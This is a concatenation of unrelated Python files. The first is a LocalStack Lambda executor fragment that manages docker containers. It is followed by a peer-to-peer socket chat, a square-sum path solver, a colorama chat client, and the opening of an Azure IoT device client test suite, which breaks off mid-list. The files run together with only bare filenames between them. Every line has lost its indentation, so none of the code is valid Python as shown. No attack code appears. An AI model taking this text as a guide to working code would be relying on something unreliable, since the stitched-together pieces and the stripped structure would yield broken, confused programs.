exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
        :param runtime: Lambda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' -e EDGE_PORT="$EDGE_PORT"'
' %s' # env_vars
' %s' # network
' %s' # dns
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str,
env_vars_str, network_str, dns_str, docker_image)
LOG.debug(cmd)
run(cmd)
if not mount_volume:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .Config.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = '%s stop -t0 %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = '%s rm %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
            # If the output is empty, the container does not exist.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
        Runs idle_container_destroyer() once and then re-schedules itself every 60 seconds,
        so idle containers are periodically checked for and destroyed.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
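    # Illustrative example of the sanitization above: an ARN such as
    # "arn:aws:lambda:us-east-1:000000000000:function:my-func" maps to the container name
    # "localstack_lambda_arn_aws_lambda_us-east-1_000000000000_function_my-func"
    # (characters other than letters, digits, '_', '.' and '-' become underscores).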
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = get_free_tcp_port()
env_vars['DOCKER_LAMBDA_API_PORT'] = port
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # env
' %s' # network
' %s' # dns
' %s' # --rm flag
' %s %s' # image and command
')";'
'%s cp "%s/." "$CONTAINER_ID:/var/task"; '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port,
env_vars_string, network_str, dns_str, rm_flag,
docker_image, command,
docker_cmd, lambda_cwd,
docker_cmd)
else:
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s -v "%s":/var/task'
' %s'
' %s' # network
' %s' # dns
' %s' # --rm flag
' %s %s'
) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string,
network_str, dns_str, rm_flag, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
        # run the Lambda function and pass its result back via a queue; note that
        # process.run() below executes do_execute in the calling process (no fork),
        # which lets CaptureOutput collect the handler's stdout/stderr
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
            # executed inline by process.run() below; the sys.path change is undone in the finally block
path_before = sys.path
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path = [lambda_cwd] + sys.path
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write('%s %s' % (e, traceback.format_exc()))
raise
finally:
sys.path = path_before
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (request_id, func_arn)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
log_output += '\nEND RequestId: %s' % request_id
log_output += '\nREPORT RequestId: %s Duration: %s ms' % (request_id, int((end_time - start_time) * 1000))
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info('Error executing Lambda "%s": %s %s' % (func_arn, error,
''.join(traceback.format_tb(error.__traceback__))))
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(.+:)?(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
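    # Illustrative example (assuming config.WINDOWS_DOCKER_MOUNT_PREFIX were '/host_mnt'):
    # format_windows_path('C:\\lambda\\code') -> '/host_mnt/C/lambda/code'.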
@classmethod
def docker_image_for_runtime(cls, runtime):
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar and *.zip files in the base folder,
as well as any JAR files in the "lib/*" and "java/lib/*" subfolders
living alongside the supplied Java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/java/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append('*.jar')
entries.append('java/lib/*.jar')
result = ':'.join(entries)
return result
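# Worked example (hypothetical layout, for illustration only): for archive
#   /tmp/lambda/handler.jar
# with sibling files /tmp/lambda/dep.jar and /tmp/lambda/lib/util.jar, the method above would
# return roughly (glob order may vary):
#   .:dep.jar:lib/util.jar:handler.jar:*.jar:java/lib/*.jar
# i.e. the supplied archive is appended after the discovered entries, so that it ends up late
# on the classpath as noted in the comment above.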
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
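# Sketch of how an executor would typically be selected from the map above (an assumption;
# the actual lookup lives elsewhere in the LocalStack codebase):
#
#   lambda_executor = AVAILABLE_EXECUTORS.get(config.LAMBDA_EXECUTOR, DEFAULT_EXECUTOR)
#
# i.e. LAMBDA_EXECUTOR=docker-reuse would pick EXECUTOR_CONTAINERS_REUSE, while an unknown or
# empty value would fall back to the separate-containers executor.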
|
chat.py
|
#!/usr/bin/env python3
import socket
import threading
import sys
import time
from random import randint
class Server:
connections = []
peers = []
def __init__(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 10000))
sock.listen(1)
print("Server running...")
while True:
conn, addr = sock.accept()
cThread = threading.Thread(target=self.handler, args=(conn,addr))
cThread.daemon = True
cThread.start()
self.connections.append(conn)
self.peers.append(addr[0])
print(str(addr[0]) + ":" + str(addr[1]), "connected")
self.sendPeers()
def handler(self, conn, addr):
while True:
data = conn.recv(1024)
for connection in self.connections:
if connection != conn:
connection.send(data)
if not data:
print(str(addr[0]) + ":" + str(addr[1]), "disconnected")
self.connections.remove(conn)
self.peers.remove(addr[0])
conn.close()
self.sendPeers()
break
def sendPeers(self):
p = ""
for peer in self.peers:
p = p + peer + ","
for connection in self.connections:
connection.send(b'\x11' + bytes(p, 'utf-8'))
class Client:
username = ""
def __init__(self, address, username):
randomColor = randint(0, 6)
colorStr = color.colors[randomColor]
self.username = color.BOLD + colorStr + username + color.END
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((address, 10000))
iThread = threading.Thread(target=self.sendMsg, args=(sock,))
iThread.daemon = True
iThread.start()
while True:
data = sock.recv(1024)
if not data:
break
if data[0:1] == b'\x11':
self.updatePeers(data[1:])
else:
print(str(data, 'utf-8'))
def sendMsg(self, sock):
while True:
message = self.username
message = message + ": " + input("")
sock.send(bytes(message, 'utf-8'))
def updatePeers(self, peerData):
p2p.peers = str(peerData, 'utf-8').split(",")[:-1]
class p2p:
peers = ['127.0.0.1']
class color:
colors = [
'\033[95m', # Purple
'\033[96m', # Cyan
'\033[36m', # Dark Cyan
'\033[94m', # Blue
'\033[92m', # Green
'\033[93m', # Yellow
'\033[91m'] # Red
BOLD = '\033[1m'
END = '\033[0m'
username = ""
if (len(sys.argv) == 2):
username = sys.argv[1]
print("Hello, " + username)
while True:
try:
print("Trying to connect...")
time.sleep(randint(1, 5))
for peer in p2p.peers:
try:
client = Client(peer, username)
except KeyboardInterrupt:
sys.exit(0)
except:
pass
if randint(1, 5) == 1:
try:
server = Server()
except KeyboardInterrupt:
sys.exit(0)
except:
print("Couldn't start the server...")
except KeyboardInterrupt:
sys.exit(0)
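# Example usage (a sketch based on the code above):
#
#   $ python3 chat.py Alice
#   Hello, Alice
#   Trying to connect...
#
# Each node first tries to connect as a Client to every address in p2p.peers; roughly one in
# five iterations it also tries to become the Server on port 10000. Peer-list updates are
# framed with a leading b'\x11' byte, which is why Client.__init__ checks data[0:1] before
# printing a received message.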
|
square_sum_recursion_all_variants.py
|
# This variant of the program shows every possible way to complete a Square-Sum Hamiltonian Path
# using the integers 1..N for the chosen length N.
# Note that half of these are just the reverse of the other half.
import threading
import time
from timeit import default_timer as timer
print("Choose length:")
count = int(input())
sqnum = list()
start = timer()
confirmed = list()
printed = list()
active = [True]
new = [False]
li = [i for i in range(count, 0, -1)]
for i in range(count, 1, -1):
if i ** 2 < count * 2:
sqnum.append(i ** 2)
def squareSum(i):
seq = i
if len(seq) == count or not active[0]:
confirmed.append(seq)
new[0] = True
return
for s in sqnum:
n = s - seq[-1]
if 0 < n <= count and n not in seq:
squareSum(seq + [n])
def check(confirmed):
if len(confirmed):
if new[0]:
for seq in range(len(printed), len(confirmed)):
print(confirmed[seq])
printed.append(confirmed[seq])
for number in li:
thread = threading.Thread(target=squareSum, args=([number],)).start()
check(confirmed)
while len(threading.enumerate()) > 1:
check(confirmed)
time.sleep(1)
if len(confirmed) == 0:
print("No solution was found")
else:
c = len(list(set(map(tuple, confirmed))))
print("Found %d solutions. That's %d excluding mirror duplicates." % (c, c / 2))
print(str(timer() - start), "sec runtime")
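# Sample run (illustrative): choosing length 15 should, among others, print the classic
# square-sum sequence
#   [8, 1, 15, 10, 6, 3, 13, 12, 4, 5, 11, 14, 2, 7, 9]
# since every adjacent pair sums to 9, 16 or 25. Its reverse is counted as a separate solution,
# which is why the final count is also reported "excluding mirror duplicates".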
|
client.py
|
import socket
import random
from threading import Thread
from datetime import datetime
from colorama import Fore, init, Back
# init colors
init()
# set the available colors
colors = [Fore.BLUE, Fore.CYAN, Fore.GREEN, Fore.LIGHTBLACK_EX,
Fore.LIGHTBLUE_EX, Fore.LIGHTCYAN_EX, Fore.LIGHTGREEN_EX,
Fore.LIGHTMAGENTA_EX, Fore.LIGHTRED_EX, Fore.LIGHTWHITE_EX,
Fore.LIGHTYELLOW_EX, Fore.MAGENTA, Fore.RED, Fore.WHITE, Fore.YELLOW
]
# choose a random color for the client
client_color = random.choice(colors)
# server's IP address
# if the server is not on this machine,
# put the private (network) IP address (e.g. 192.168.1.2)
SERVER_HOST = "127.0.0.1"
SERVER_PORT = 5002 # server's port
separator_token = "<SEP>" # we will use this to separate the client name & message
# initialize TCP socket
s = socket.socket()
print(f"[*] Connecting to {SERVER_HOST}:{SERVER_PORT}...")
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))
print("[+] Connected.")
# prompt the client for a name
name = input("Enter your name: ")
def listen_for_messages():
while True:
message = s.recv(1024).decode()
print("\n" + message)
# make a thread that listens for messages to this client & prints them
t = Thread(target=listen_for_messages)
# make the thread daemon so it ends whenever the main thread ends
t.daemon = True
# start the thread
t.start()
while True:
# input message we want to send to the server
to_send = input()
# a way to exit the program
if to_send.lower() == 'q':
break
# add the datetime, name & the color of the sender
date_now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
to_send = f"{client_color}[{date_now}] {name}{separator_token}{to_send}{Fore.RESET}"
# finally, send the message
s.send(to_send.encode())
# close the socket
s.close()
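# For context, a minimal sketch of what the matching server side might do with the separator
# (an assumption -- the server script is not included in this file):
#
#   name, text = received.split(separator_token, 1)
#   broadcast(f"{name}: {text}")
#
# which is why the client packs "<color>[timestamp] name<SEP>message<reset>" into a single send().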
|
test_sync_clients.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from azure.iot.device.common.pipeline.pipeline_exceptions import OperationCancelled
from azure.iot.device.common.evented_callback import EventedCallback
import pytest
import logging
import threading
import time
import os
import io
import six
import six.moves.urllib as urllib
from azure.iot.device.iothub import IoTHubDeviceClient, IoTHubModuleClient
from azure.iot.device import exceptions as client_exceptions
from azure.iot.device.common.auth import sastoken as st
from azure.iot.device.iothub.pipeline import constant as pipeline_constant
from azure.iot.device.iothub.pipeline import exceptions as pipeline_exceptions
from azure.iot.device.iothub.pipeline import IoTHubPipelineConfig
from azure.iot.device.iothub.models import Message, MethodRequest
from azure.iot.device.iothub.sync_inbox import SyncClientInbox
from azure.iot.device.iothub.abstract_clients import (
RECEIVE_TYPE_NONE_SET,
RECEIVE_TYPE_HANDLER,
RECEIVE_TYPE_API,
)
from azure.iot.device import constant as device_constant
from .shared_client_tests import (
SharedIoTHubClientInstantiationTests,
SharedIoTHubClientPROPERTYHandlerTests,
SharedIoTHubClientPROPERTYReceiverHandlerTests,
SharedIoTHubClientPROPERTYConnectedTests,
SharedIoTHubClientOCCURRENCEConnectTests,
SharedIoTHubClientOCCURRENCEDisconnectTests,
SharedIoTHubClientOCCURRENCENewSastokenRequired,
SharedIoTHubClientCreateFromConnectionStringTests,
SharedIoTHubDeviceClientCreateFromSymmetricKeyTests,
SharedIoTHubDeviceClientCreateFromSastokenTests,
SharedIoTHubDeviceClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromSastokenTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
)
logging.basicConfig(level=logging.DEBUG)
##################
# INFRASTRUCTURE #
##################
# TODO: now that there are EventedCallbacks, tests should be updated to test their use
# (which is much simpler than this infrastructure)
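# For a sense of that simpler style, see SharedClientDisconnectTests.test_waits_for_pipeline_op_completion
# further down, which patches EventedCallback directly; a minimal sketch of the pattern
# (illustrative only):
#
#   cb_mock = mocker.MagicMock()
#   mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback", return_value=cb_mock)
#   client.connect()
#   assert cb_mock.wait_for_completion.call_count == 1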
class WaitsForEventCompletion(object):
def add_event_completion_checks(self, mocker, pipeline_function, args=[], kwargs={}):
event_init_mock = mocker.patch.object(threading, "Event")
event_mock = event_init_mock.return_value
def check_callback_completes_event():
# Assert exactly one Event was instantiated so we know the following asserts
# are related to the code under test ONLY
assert event_init_mock.call_count == 1
# Assert waiting for Event to complete
assert event_mock.wait.call_count == 1
assert event_mock.set.call_count == 0
# Manually trigger callback
cb = pipeline_function.call_args[1]["callback"]
cb(*args, **kwargs)
# Assert Event is now completed
assert event_mock.set.call_count == 1
event_mock.wait.side_effect = check_callback_completes_event
##########################
# SHARED CLIENT FIXTURES #
##########################
@pytest.fixture
def handler():
def _handler_function(arg):
pass
return _handler_function
#######################
# SHARED CLIENT TESTS #
#######################
class SharedClientShutdownTests(WaitsForEventCompletion):
@pytest.mark.it("Performs a client disconnect (and everything that entails)")
def test_calls_disconnect(self, mocker, client):
# We merely check that disconnect is called here. Doing so does several things, which
# are covered by the disconnect tests themselves. Those tests will NOT be duplicated here
client.disconnect = mocker.MagicMock()
assert client.disconnect.call_count == 0
client.shutdown()
assert client.disconnect.call_count == 1
@pytest.mark.it("Begins a 'shutdown' pipeline operation")
def test_calls_pipeline_shutdown(self, mocker, client, mqtt_pipeline):
# mock out implicit disconnect
client.disconnect = mocker.MagicMock()
client.shutdown()
assert mqtt_pipeline.shutdown.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'shutdown' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.shutdown
)
# mock out implicit disconnect
client_manual_cb.disconnect = mocker.MagicMock()
client_manual_cb.shutdown()
@pytest.mark.it(
"Raises a client error if the `shutdown` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
# The only other expected errors are unexpected ones.
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
# mock out implicit disconnect
client_manual_cb.disconnect = mocker.MagicMock()
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.shutdown,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.shutdown()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Stops the client event handlers after the `shutdown` pipeline operation is complete"
)
def test_stops_client_event_handlers(self, mocker, client, mqtt_pipeline):
# mock out implicit disconnect
client.disconnect = mocker.MagicMock()
# Spy on handler manager stop. Note that while it does get called twice in shutdown, it
# only happens once here because we have mocked disconnect (which is where the first stoppage occurs)
hm_stop_spy = mocker.spy(client._handler_manager, "stop")
def check_handlers_and_complete(callback):
assert hm_stop_spy.call_count == 0
callback()
mqtt_pipeline.shutdown.side_effect = check_handlers_and_complete
client.shutdown()
assert hm_stop_spy.call_count == 1
assert hm_stop_spy.call_args == mocker.call(receiver_handlers_only=False)
class SharedClientConnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'connect' pipeline operation")
def test_calls_pipeline_connect(self, client, mqtt_pipeline):
client.connect()
assert mqtt_pipeline.connect.call_count == 1
@pytest.mark.it("Waits for the completion of the 'connect' pipeline operation before returning")
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.connect
)
client_manual_cb.connect()
@pytest.mark.it(
"Raises a client error if the `connect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.TlsExchangeAuthError,
client_exceptions.ClientError,
id="TlsExchangeAuthError->ClientError",
),
pytest.param(
pipeline_exceptions.ProtocolProxyError,
